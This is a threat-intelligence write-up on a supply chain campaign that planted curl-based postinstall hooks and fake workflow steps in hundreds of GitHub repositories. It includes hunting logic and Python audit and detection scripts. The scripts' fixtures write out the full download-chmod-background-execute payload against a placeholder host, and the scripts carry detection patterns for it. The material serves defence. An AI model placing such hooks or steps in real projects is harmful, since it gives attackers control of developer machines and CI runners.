
Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects

A widespread supply chain attack compromised hundreds of GitHub repositories by injecting malicious postinstall scripts into package.json files and GitHub Actions workflows. The payload uses curl to download a remote Linux binary disguised as an SSH daemon, primarily targeting PHP projects that bundle JavaScript build tools to bypass standard Composer dependency reviews.

Sens: Immediate · Conf: high · Analyzed: 2026-05-23 · Google

Authors: Socket Research Team

Actors: parikhpreyash4

Source: Socket

IOCs: 2

Detection / Hunter: Google

What Happened

Security researchers discovered a widespread attack where malicious instructions were hidden inside the installation files of over 700 open-source software projects. Developers and organizations using these compromised projects, specifically those combining PHP and JavaScript tools, are at risk. When the software is installed, the hidden instructions automatically download and run a malicious program in the background, potentially giving attackers control over the victim's computer or company servers. Organizations should carefully review the installation scripts of their open-source software and monitor their systems for unauthorized background programs.

Key Takeaways

  • A coordinated supply chain campaign compromised over 700 GitHub repositories by injecting malicious postinstall hooks into package.json files.
  • The attack specifically targeted PHP Composer packages that bundle JavaScript build tooling, exploiting a blind spot where developers might only review composer.json.
  • The malicious script downloads a Linux binary (gvfsd-network) from a GitHub Releases URL, saves it as /tmp/.sshd, and executes it in the background.
  • The same payload was also found injected into GitHub Actions workflow files under the guise of a 'Dependency Cache Sync' step.
  • Laravel starter kits (e.g., devdojo/wave, devdojo/genesis) were among the most impacted, as their package.json files land at the project root where npm install runs scripts directly.

Affected Systems

  • Linux environments running Node.js (npm install) or GitHub Actions CI/CD pipelines
  • PHP Composer projects that bundle JavaScript build tooling (e.g., Laravel starter kits)

Attack Chain

The attacker compromises upstream GitHub repositories and injects a malicious postinstall script into package.json or a malicious step into GitHub Actions workflow files. When a victim installs the package via npm install or triggers the CI/CD pipeline, the script executes. It uses curl to download a Linux binary (gvfsd-network) from an attacker-controlled GitHub Releases URL without TLS verification. The binary is saved to /tmp/.sshd, made executable, and launched in the background to establish a foothold.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules but outlines behavioral indicators such as suspicious curl commands in postinstall scripts and GitHub Actions workflows.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions should easily detect a Node.js or CI/CD runner process spawning a shell that uses curl to download an executable to /tmp and immediately runs it.
  • Network Visibility: Medium. The download occurs over HTTPS from a legitimate domain (github.com), making network-based detection difficult without SSL inspection or specific URL path monitoring.
  • Detection Difficulty: Moderate. While the behavior is highly suspicious, the use of legitimate platforms (GitHub Releases) and standard tools (curl, npm) requires correlating process ancestry to avoid false positives.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Sysmon Event ID 11)
  • Linux Auditd (execve)

Hunting Hypotheses

Hypothesis 1: Look for package managers (npm, yarn) or CI/CD runner processes spawning shell commands that download files to hidden paths in /tmp.
  • Telemetry: Process execution logs (Linux auditd, EDR process telemetry)
  • ATT&CK Stage: Execution
  • FP Risk: Low

Hypothesis 2: Identify instances of curl executing with flags -skL downloading files directly to hidden files (starting with '.') in the /tmp directory.
  • Telemetry: Command line execution logs
  • ATT&CK Stage: Command and Control
  • FP Risk: Low
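The two hunting hypotheses above, turned into runnable detection logic as an added example (this is not code from the Socket write-up or from any affected project). It runs over a handful of constructed process-creation events of the kind an auditd execve or EDR pipeline would emit; the field names pid/ppid/comm/cmdline, the GitHub Actions runner process names Runner.Worker/Runner.Listener, and the download host releases.example.invalid are assumptions and placeholders, not values from the report.

```python
"""Hunt for curl/wget writes to hidden /tmp paths with package-manager or CI-runner ancestry.

Added example, not code from Socket or any affected project. Telemetry field names and
runner process names are assumptions about the log schema.
"""
import re
import shlex
from dataclasses import dataclass

PACKAGE_MANAGERS = {"npm", "node", "yarn", "pnpm", "npx"}
CI_RUNNERS = {"Runner.Worker", "Runner.Listener"}   # assumption: GitHub Actions runner comm names
DOWNLOADERS = {"curl", "wget"}
HIDDEN_TMP = re.compile(r"/tmp/\.[^\s/]+")           # e.g. /tmp/.sshd
INSECURE_LONG = {"-k", "--insecure", "--no-check-certificate"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    comm: str       # executable name as auditd/EDR reports it
    cmdline: str


def ancestry(event, by_pid):
    """Return [comm, parent comm, grandparent comm, ...], stopping at unknown or cyclic pids."""
    chain, seen = [event.comm], {event.pid}
    parent = by_pid.get(event.ppid)
    while parent is not None and parent.pid not in seen:
        chain.append(parent.comm)
        seen.add(parent.pid)
        parent = by_pid.get(parent.ppid)
    return chain


def has_insecure_tls_flag(comm, argv):
    """True if TLS verification is disabled; curl bundles short options, so -skL carries -k."""
    for arg in argv[1:]:
        if arg in INSECURE_LONG:
            return True
        if comm == "curl" and re.fullmatch(r"-[A-Za-z]+", arg) and "k" in arg[1:]:
            return True
    return False


def hunt(events):
    """Apply both hypotheses: hidden /tmp output plus either an insecure download flag
    (hypothesis 2) or a package-manager/CI-runner ancestor (hypothesis 1)."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if e.comm not in DOWNLOADERS:
            continue
        try:
            argv = shlex.split(e.cmdline)
        except ValueError:          # unbalanced quotes in the captured command line
            argv = e.cmdline.split()
        chain = ancestry(e, by_pid)
        reasons = []
        if HIDDEN_TMP.search(e.cmdline):
            reasons.append("hidden_tmp_output")
        if has_insecure_tls_flag(e.comm, argv):
            reasons.append("insecure_tls")
        if any(c in PACKAGE_MANAGERS or c in CI_RUNNERS for c in chain[1:]):
            reasons.append("package_manager_or_ci_ancestor")
        if "hidden_tmp_output" in reasons and len(reasons) >= 2:
            findings.append({"pid": e.pid, "chain": " <- ".join(chain), "reasons": reasons})
    return findings


# Constructed sample telemetry; releases.example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "node", "npm install"),
    ProcEvent(101, 100, "sh", 'sh -c "curl -skL https://releases.example.invalid/gvfsd-network '
                              '-o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &"'),
    ProcEvent(102, 101, "curl", "curl -skL https://releases.example.invalid/gvfsd-network -o /tmp/.sshd"),
    # benign: an interactive shell fetching an installer into a visible path with TLS checks on
    ProcEvent(200, 1, "bash", "bash"),
    ProcEvent(201, 200, "curl", "curl -sSL https://example.invalid/setup.sh -o /tmp/setup.sh"),
    # CI runner executing an injected workflow step that writes a hidden file (no -k this time)
    ProcEvent(300, 1, "Runner.Worker", "Runner.Worker"),
    ProcEvent(301, 300, "bash", "bash -e /tmp/_runner/step.sh"),
    ProcEvent(302, 301, "curl", "curl -fsSL https://releases.example.invalid/gvfsd-network -o /tmp/.cache-sync"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['chain']} [{', '.join(f['reasons'])}]")
```

The benign admin download (pid 201) produces no finding because the output path is not hidden, which is where the stated low false-positive rate comes from; the CI case (pid 302) still fires on ancestry alone even though the attacker dropped the insecure flag, so the two hypotheses are worth running together rather than as one combined rule.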

Control Gaps

  • Lack of integrity checks on postinstall scripts
  • Over-reliance on Composer metadata scanning while ignoring bundled package.json files in PHP projects

Key Behavioral Indicators

  • Process ancestry: npm/node -> sh -> curl
  • File creation: /tmp/.sshd
  • Execution of hidden files in /tmp

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Audit projects using PHP Composer that also bundle JavaScript tooling for unexpected package.json postinstall scripts.
  • Search CI/CD environments and GitHub Actions workflows for unauthorized steps, specifically looking for 'Dependency Cache Sync' executing curl commands.
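An added example (not Socket's code nor any affected project's) implementing the two audit steps above: it walks a checkout, flags package.json lifecycle hooks and GitHub Actions run: steps that fetch remote content, disable TLS checks, write to hidden /tmp paths, mark a file executable or background a process, and reports which step or hook triggered. The repository it builds in a temporary directory is a constructed fixture with example.invalid as a placeholder download host; the pattern heuristics and the line-based workflow splitting (no YAML library) are assumptions to tune for your own code base.

```python
"""Audit a checkout for risky package.json lifecycle hooks and GitHub Actions steps.

Added example, not code from Socket or any affected project. The heuristics and the
line-based workflow parsing are assumptions; tune them for your own repositories.
"""
import json
import os
import re
import tempfile

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
RISKY_PATTERNS = {
    "remote_download": re.compile(r"\b(?:curl|wget)\b"),
    # a bundled short-option group containing k (e.g. -skL) or the long forms
    "insecure_tls": re.compile(r"(?<!\S)-[A-Za-z]*k[A-Za-z]*(?!\S)|--insecure|--no-check-certificate"),
    "hidden_tmp_path": re.compile(r"/tmp/\.[^\s/]+"),
    "make_executable": re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b"),
    "backgrounded": re.compile(r"(?<!&)&\s*$", re.MULTILINE),   # trailing '&', not '&&' or '2>&1'
}
STEP_START = re.compile(r"^\s*-\s*(name|uses|run):\s*(.*)$")


def classify(command):
    """Return the sorted names of risky patterns found in a shell command or step body."""
    return sorted(name for name, rx in RISKY_PATTERNS.items() if rx.search(command))


def audit_package_json(path):
    try:
        with open(path, encoding="utf-8") as f:
            data = json.load(f)
    except (OSError, ValueError):
        return []
    scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str) and (reasons := classify(cmd)):
            findings.append({"file": path, "where": f"scripts.{hook}", "reasons": reasons})
    return findings


def audit_workflow(path):
    """Split a workflow at '- name:' / '- uses:' / '- run:' and classify each step that has a run: body."""
    steps, name, buf = [], None, []
    with open(path, encoding="utf-8") as f:
        for line in f:
            m = STEP_START.match(line)
            if m:
                if buf:
                    steps.append((name, "".join(buf)))
                name = m.group(2).strip().strip("'\"") if m.group(1) == "name" else None
                buf = []
            buf.append(line)
    if buf:
        steps.append((name, "".join(buf)))
    findings = []
    for name, text in steps:
        if "run:" in text and (reasons := classify(text)):
            findings.append({"file": path, "where": f"step '{name or '<unnamed>'}'", "reasons": reasons})
    return findings


def audit_repo(root):
    """Scan every package.json (root and nested, vendored trees included) and .github/workflows/*.yml."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if d != ".git")
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        for fn in sorted(filenames):
            full = os.path.join(dirpath, fn)
            if fn == "package.json":
                findings += audit_package_json(full)
            elif rel.endswith(".github/workflows") and fn.endswith((".yml", ".yaml")):
                findings += audit_workflow(full)
    for f in findings:
        f["file"] = os.path.relpath(f["file"], root).replace(os.sep, "/")
    return findings


def write(path, text):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)


def build_sample_repo(root):
    """Constructed fixture: a starter-kit style root package.json with an injected hook, a workflow with
    an injected 'Dependency Cache Sync' step, and a clean nested package.json. example.invalid is a placeholder."""
    payload = ("curl -skL https://example.invalid/releases/download/v1/gvfsd-network -o /tmp/.sshd"
               " && chmod +x /tmp/.sshd && /tmp/.sshd >/dev/null 2>&1 &")
    write(os.path.join(root, "package.json"),
          json.dumps({"private": True, "scripts": {"dev": "vite", "build": "vite build", "postinstall": payload}}))
    write(os.path.join(root, "packages", "ui", "package.json"),
          json.dumps({"name": "ui", "scripts": {"postinstall": "node scripts/patch-esm.js"}}))
    write(os.path.join(root, ".github", "workflows", "ci.yml"), """name: CI
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Install dependencies
        run: npm ci
      - name: Dependency Cache Sync
        run: |
          curl -skL https://example.invalid/releases/download/v1/gvfsd-network -o /tmp/.sshd
          chmod +x /tmp/.sshd
          /tmp/.sshd >/dev/null 2>&1 &
      - name: Test
        run: npm test
""")


def demo():
    with tempfile.TemporaryDirectory() as root:
        build_sample_repo(root)
        return audit_repo(root)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['file']} [{finding['where']}]: {', '.join(finding['reasons'])}")
```

Point audit_repo at a real checkout (including vendor/ for Composer-installed packages, since the report's point is that the package.json travels inside PHP dependencies) and treat any hook hitting remote_download together with hidden_tmp_path or insecure_tls as a blocker; a clean postinstall such as the nested "node scripts/patch-esm.js" produces no reasons at all.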

Infrastructure Hardening

  • Consider disabling lifecycle scripts (e.g., using npm install --ignore-scripts) in CI/CD pipelines where postinstall hooks are not strictly required.
  • Implement network egress filtering on CI/CD runners to restrict outbound connections to approved domains and repositories.

User Protection

  • Ensure developer workstations have EDR coverage capable of detecting suspicious child processes spawned by package managers.

Security Awareness

  • Educate development teams on the risks of supply chain attacks targeting cross-ecosystem dependencies, such as JavaScript hooks embedded in PHP projects.

MITRE ATT&CK Mapping

  • T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1105 - Ingress Tool Transfer
  • T1564.001 - Hide Artifacts: Hidden Files and Directories

Additional IOCs

  • File Paths:
    • /tmp/.sshd - Hidden file path used to store the downloaded malicious binary
  • Command Lines:
    • Purpose: Download and execute malicious payload in the background while suppressing errors and bypassing TLS verification | Tools: curl, chmod, sh | Stage: Execution